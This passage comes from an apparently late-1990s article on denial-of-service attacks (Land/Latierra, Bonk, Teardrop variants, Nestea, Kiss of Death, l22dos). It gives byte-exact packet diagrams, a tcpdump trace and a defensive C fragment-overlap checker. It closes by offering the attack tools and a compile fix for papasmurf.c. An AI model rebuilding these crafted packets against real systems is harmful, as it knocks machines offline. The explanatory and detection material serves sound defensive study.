 Soon afterwards another little program appeared, Latierra. It allowed
 sending not just one but many packets per run, and in addition a start and
 an end port could be given, so that there was no longer any need to look
 for open ports on the enemy machine; you could simply say "send packets
 from this port to this port" and hope that one of them is open.

 An additional innovation in Latierra was that it also sets the PUSH flag on
 the SYN packets, although through command-line options you can also decide
 for yourself which flags are set.

 Here is what a Land attack looks like, as carried out by the original
 land.c:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            28      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Identification (autor initials)|Flags|    Fragment Offset      |
     |       0F              1C      |     |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       FF      |   06 = TCP    | (filled by kernel)   AE B1    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |              Source Address (same as destination)             |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   TCP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Source Port (at test)     |    Destination Port (same)    |
     |       00              15      |         00            15      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                       Sequence Number                         |
     |       00              00                0F            1C      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                    Acknowledgement Number                     |
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Offset | (reserved)|   Flags   |          Window               |
     |   5   |     0     |    SYN    |         08            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Checksum               |      Urgent Pointer           |
     |       9A              9A      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data: none

 ****************************************************************************


     2.2.4. Bonk
     -----------

 Bonk, which came out on 1-May-1998, is based on Teardrop, but is not quite
 the same. It was created to attack specifically Windows machines patched
 against Teardrop, and evidently relies on some bug in the patch itself.
 Draw your own conclusions about Windows and Microsoft... Well, it is not
 easy to fix sloppy code without comments ;-)

 What Bonk does is actually almost Teardrop, but in reverse (heheh, sounds
 strange, doesn't it? ;-). While the idea of Teardrop is for the second
 fragment to fall entirely inside the first (i.e. leaving room in front and
 behind), Bonk aims to do the opposite - the fragment again falls inside,
 but its end coincides with the end of the first fragment (it sticks to it,
 not from the outside but from the inside).

 The difference between the packets sent by Bonk and those from Teardrop is
 only in the fragment offset of the second packet. While in Teardrop it
 contains 3 (i.e. an offset of 24 bytes), in Bonk it is 4 (i.e. an offset of
 32 bytes).

 This DoS attack does not appear to affect other operating systems. And here
 is exactly what packets are sent:

   Fragment #1:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            38      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       04              55      |  MF |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       FF      |   11 = UDP    | (filled by kernel)   FE 42    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   UDP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         Source Port           |      Destination Port         |
     |       00              35      |         00            35      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Length              |          Checksum             |
     |       00              24      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Fragment #2:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            18      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       04              55      |     |     00          04      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       FF      |   11 = UDP    | (filled by kernel)   1E 5F    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data (the same as at the start of the previous packet):

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              35                00            35      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 ****************************************************************************


     2.2.5. Nestea
     -------------

 Nestea exploited the "Off by One IP Header" bug in the fragmentation code
 of Linux kernels 2.0.* and 2.1.*, the newest at the time (16-Apr-1998). It
 also crashes some Windows machines.

 Later nestea2.c came out as well; it sends exactly the same packets and
 simply offers a few more options.

 A look at Nestea's source code reveals that the author actually took
 newtear.c and modified it. There is nothing wrong with that, of course -
 good programmers write good code, and truly great programmers "borrow" good
 code ;-) Either way, the result is the same - a new DoS attack.

 Nestea.c sends three UDP fragments. The first is a completely normal
 packet - a 26-byte IP datagram in which the UDP data (excluding the UDP
 header) is 10 bytes. It is as if a normal unfragmented packet were being
 sent, except that its "More Fragments" flag has been set.

 A second fragment is also sent, supposedly a continuation of the first,
 with a large Total Length (136) and Fragment Offset (6, i.e. 48 bytes), and
 with "More Fragments" cleared.

 To top it off, a third packet is sent with an even greater length (284
 bytes) and "More Fragments" set.

 There may be a bug in the program here - first a valid UDP header is filled
 in (with a length considerably shorter than it would need to be to fill a
 284-byte packet), but the author forgets to advance the pointer by four
 bytes, so half of the UDP header gets overwritten with random data (namely
 UDP Length and Checksum). Anyway, since nestea works, there is nothing to
 worry about.

 Here is how the attack looks to an outside observer (damn him, so he's
 going to sniff, eh? ;-) :

   Fragment #1:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            26      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              F2      |  MF |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   11 = UDP    | (filled by kernel)   C0 B8    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   UDP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      Source Port (random)     |   Destination Port (random)   |
     |       B6              E6      |         7C            C0      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Length              |          Checksum             |
     |       00              12      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00        |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Fragment #2:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            88      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              F2      |     |     00          06      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   11 = UDP    | (filled by kernel)   E0 50    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data (the same as at the start of the previous fragment, but with a
          changed UDP header... Huh? Isn't this a fragment? Anyway)

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       B6              E6                7C            C0      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              74      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       ...
     +-+-+-+-+-

   Fragment #3:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   F   |       00      |         01            1C      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              F2      |  MF |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   11 = UDP    | (filled by kernel)   B5 C2    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                Source Address (spoofed sample)                |
     |       0C              0D                0E            0F      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   UDP Header:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         Source Port           |      Destination Port         |
     |       B6              E6      |         7C            C0      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Length (random)        |       Checksum (random)       |
     |       B1              AA      |         CF            37      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data (random):

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       2D              45      |         03            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       44              00      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       20              01      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00      |         08            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       ...
     +-+-+-+-+-

 ****************************************************************************


     2.2.6. Kiss of Death
     --------------------

 Kiss of Death (kod.c) came out quite recently. It relies on the fact that
 the handling of IGMP packets in Windows is not written properly. Kod causes
 a blue screen on Windows 98 / 98se and kills the TCP stack. After pressing
 Enter the user can carry on working in Windows, but no longer has a TCP
 stack. Packets can leave the machine, but it does not notice that it is
 receiving packets. If, for example, some address is pinged, the ICMP echo
 request packets will go out, but the machine will not notice the echo
 replies.

 The solution is for the user to reconnect to their ISP (if on a modem... If
 on a TCP/IP network, I no longer know :-)

 The program sends one single IGMP packet, split however into 11 fragments,
 which are sent in reverse order. Just in case, they are then sent once
 more, again in reverse order, so that the total number of datagrams sent
 is 22.

 The interesting thing is that a completely valid IGMP packet is sent,
 albeit backwards, which nevertheless manages to cause an error in Windows.

 Even more interesting is that the perfectly ordinary "ping" command under
 UNIX, when given a packet length of, say, 32000 or so, also fragments the
 packet, and on top of that sends the ICMP fragments in reverse order...
 Well, Kiss of Death does the same, but with IGMP instead of ICMP.

 Since the fragments are completely legal, there is no point in filling the
 article with an IP dump here. Here is simply how the attack looks when
 viewed with tcpdump:

 15:53:37.899412 12.13.14.15 > localhost: (frag 48648:200@14800)
 15:53:37.901212 12.13.14.15 > localhost: (frag 48648:1480@13320+)
 15:53:37.901392 12.13.14.15 > localhost: (frag 48648:1480@11840+)
 15:53:37.901534 12.13.14.15 > localhost: (frag 48648:1480@10360+)
 15:53:37.901681 12.13.14.15 > localhost: (frag 48648:1480@8880+)
 15:53:37.901828 12.13.14.15 > localhost: (frag 48648:1480@7400+)
 15:53:37.901972 12.13.14.15 > localhost: (frag 48648:1480@5920+)
 15:53:37.902117 12.13.14.15 > localhost: (frag 48648:1480@4440+)
 15:53:37.902262 12.13.14.15 > localhost: (frag 48648:1480@2960+)
 15:53:37.902401 12.13.14.15 > localhost: (frag 48648:1480@1480+)
 15:53:37.902541 12.13.14.15 > localhost: igmp-0 [v0][|igmp] (frag
                                                              48648:1480@0+)

 and then the same thing repeated once more (just in case).

 Soon afterwards kox.c came out from another author, which was supposedly
 better, with spoofing and so on, but I did not see anything in it that is
 not in the first one, so - use KOD.
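
 Added example (not part of the original article, and not code from any of
 the tools it discusses): a small C checker that a sniffer or IDS could run
 over captured IPv4 headers to flag the overlapping fragments diagrammed in
 2.2.4 (Bonk) and 2.2.5 (Nestea). The header bytes are transcribed from
 those diagrams; the 2.2.6 headers are rebuilt from the tcpdump trace with
 constructed TTL and checksum bytes, and all function and flag names are
 hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FRAG_OVERLAP   0x1 /* payload range intersects an earlier fragment */
#define FRAG_UNALIGNED 0x2 /* MF set, payload length not a multiple of 8   */
#define FRAG_MALFORMED 0x4 /* bad version, IHL or Total Length             */
#define MAX_TRACKED    32

struct frag {
    uint8_t  key[11];     /* src(4) dst(4) proto(1) id(2): reassembly key */
    int      mf;          /* "More Fragments" flag */
    uint32_t start, end;  /* payload bytes [start, end) of the datagram */
};

/* Decode the fixed 20 bytes of an IPv4 header; 0 on success, -1 if bad. */
static int parse_frag(const uint8_t *h, struct frag *f)
{
    uint32_t ihl   = (uint32_t)(h[0] & 0x0F) * 4;
    uint32_t total = ((uint32_t)h[2] << 8) | h[3];
    uint32_t fo    = ((uint32_t)h[6] << 8) | h[7];
    if ((h[0] >> 4) != 4 || ihl < 20 || total < ihl)
        return -1;
    memcpy(f->key, h + 12, 8);            /* source and destination address */
    f->key[8] = h[9];                     /* protocol */
    f->key[9] = h[4]; f->key[10] = h[5];  /* identification */
    f->mf    = (fo & 0x2000) != 0;
    f->start = (fo & 0x1FFF) * 8;         /* offset counts 8-byte units */
    f->end   = f->start + (total - ihl);
    return 0;
}

/* OR of FRAG_* flags raised by n 20-byte headers given in arrival order. */
int check_fragments(const uint8_t *hdrs, size_t n)
{
    struct frag seen[MAX_TRACKED], f;
    size_t nseen = 0, i, j;
    int flags = 0;
    for (i = 0; i < n; i++) {
        if (parse_frag(hdrs + 20 * i, &f) != 0) { flags |= FRAG_MALFORMED; continue; }
        if (!f.mf && f.start == 0)
            continue;                     /* whole datagram, not a fragment */
        if (f.mf && (f.end - f.start) % 8 != 0)
            flags |= FRAG_UNALIGNED;
        for (j = 0; j < nseen; j++)       /* compare with earlier fragments */
            if (memcmp(f.key, seen[j].key, sizeof f.key) == 0 &&
                f.start < seen[j].end && seen[j].start < f.end)
                flags |= FRAG_OVERLAP;
        if (nseen < MAX_TRACKED)
            seen[nseen++] = f;
    }
    return flags;
}

/* IP headers transcribed from the Bonk diagrams in 2.2.4. */
static const uint8_t BONK[2 * 20] = {
    0x45,0x00,0x00,0x38, 0x04,0x55,0x20,0x00, 0xFF,0x11,0xFE,0x42,
    0x0C,0x0D,0x0E,0x0F, 0x7F,0x00,0x00,0x01,
    0x45,0x00,0x00,0x18, 0x04,0x55,0x00,0x04, 0xFF,0x11,0x1E,0x5F,
    0x0C,0x0D,0x0E,0x0F, 0x7F,0x00,0x00,0x01,
};
/* First 20 header bytes transcribed from the Nestea diagrams in 2.2.5. */
static const uint8_t NESTEA[3 * 20] = {
    0x45,0x00,0x00,0x26, 0x00,0xF2,0x20,0x00, 0x40,0x11,0xC0,0xB8,
    0x0C,0x0D,0x0E,0x0F, 0x7F,0x00,0x00,0x01,
    0x45,0x00,0x00,0x88, 0x00,0xF2,0x00,0x06, 0x40,0x11,0xE0,0x50,
    0x0C,0x0D,0x0E,0x0F, 0x7F,0x00,0x00,0x01,
    0x4F,0x00,0x01,0x1C, 0x00,0xF2,0x20,0x00, 0x40,0x11,0xB5,0xC2,
    0x0C,0x0D,0x0E,0x0F, 0x7F,0x00,0x00,0x01,
};

/* Rebuild the 11 headers of the tcpdump trace in 2.2.6 (id 48648, IGMP) in
 * the order shown, last fragment first. TTL and checksum are constructed. */
static void build_kod(uint8_t *out)
{
    for (int i = 0; i < 11; i++) {
        uint32_t off = 14800u - 1480u * (uint32_t)i;  /* 14800, 13320, .. 0 */
        uint32_t len = (i == 0 ? 200u : 1480u) + 20u; /* payload + header   */
        uint32_t fo  = (off / 8) | (i == 0 ? 0u : 0x2000u);
        uint8_t *h = out + 20 * i;
        memcpy(h, BONK, 20);         /* reuse 12.13.14.15 > 127.0.0.1 */
        h[2] = (uint8_t)(len >> 8);  h[3] = (uint8_t)(len & 0xFF);
        h[4] = 48648 >> 8;           h[5] = 48648 & 0xFF;
        h[6] = (uint8_t)(fo >> 8);   h[7] = (uint8_t)(fo & 0xFF);
        h[9] = 2;                    /* protocol 2 = IGMP */
    }
}

int check_bonk(void)   { return check_fragments(BONK, 2); }
int check_nestea(void) { return check_fragments(NESTEA, 3); }
int check_kod(void)    { uint8_t b[11 * 20]; build_kod(b); return check_fragments(b, 11); }
int main(void)
{
    printf("bonk=%d nestea=%d kod=%d\n", check_bonk(), check_nestea(), check_kod());
    return 0;
}
```

 Both overlap cases raise FRAG_OVERLAP together with FRAG_UNALIGNED, while
 the reverse-ordered but well-formed trace from 2.2.6 raises nothing, so an
 overlap check alone does not cover that attack.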

 ****************************************************************************


     2.2.7. Linux 2.2 DoS attack
     ---------------------------

 L22dos is an attack that causes a kernel panic on Linux 2.2.x kernels
 (tested by the author on 2.2.7 and 2.2.9). It came out on 1-Jun-1999.
 Unfortunately, I personally did not manage to test it on myself, since by
 the time I got hold of it (around 16-17 June) I was already running 2.2.10,
 which is already fixed, but other people passed the tests very
 successfully ;-)

 On the evening of 1-Jun Alan Cox confirmed the bug and released a patch.
 The author of l22dos thinks that the cause lies in the 1024-byte length of
 the packet and the random type/subtype, sequence and various other things.
 According to Alan Cox, however, the program was buggy, and that is why it
 caused a kernel panic.

 All the program does is send an ICMP packet with a random source address,
 icmp type, icmp code, icmp sequence number... And that's it! 1000 packets
 are sent. For understandable reasons, a diagram of the packets sent is not
 included.

 ****************************************************************************


     3. Source Codes
     ---------------

 You may be interested in seeing what exactly the programs are, or in having
 them yourself. Well, here are a few, to scratch the itch ;-)

 The sources provided here are in plain C and compile without any problems
 under Linux, and should do so on other platforms too. The only exceptions
 are papasmurf.c and l22dos.cpp.

 papasmurf.c does not compile properly under Linux. The only change you need
 to make for it to compile normally is to replace, on lines 507 to 511, the
 fields in the UDP header with the real names under which they are defined
 in linux/udp.h, namely source, dest and len.

 l22dos.cpp, on the other hand, is a C++ file. Pay attention to this,
 because you will not be able to compile it with gcc. Use g++ for that.


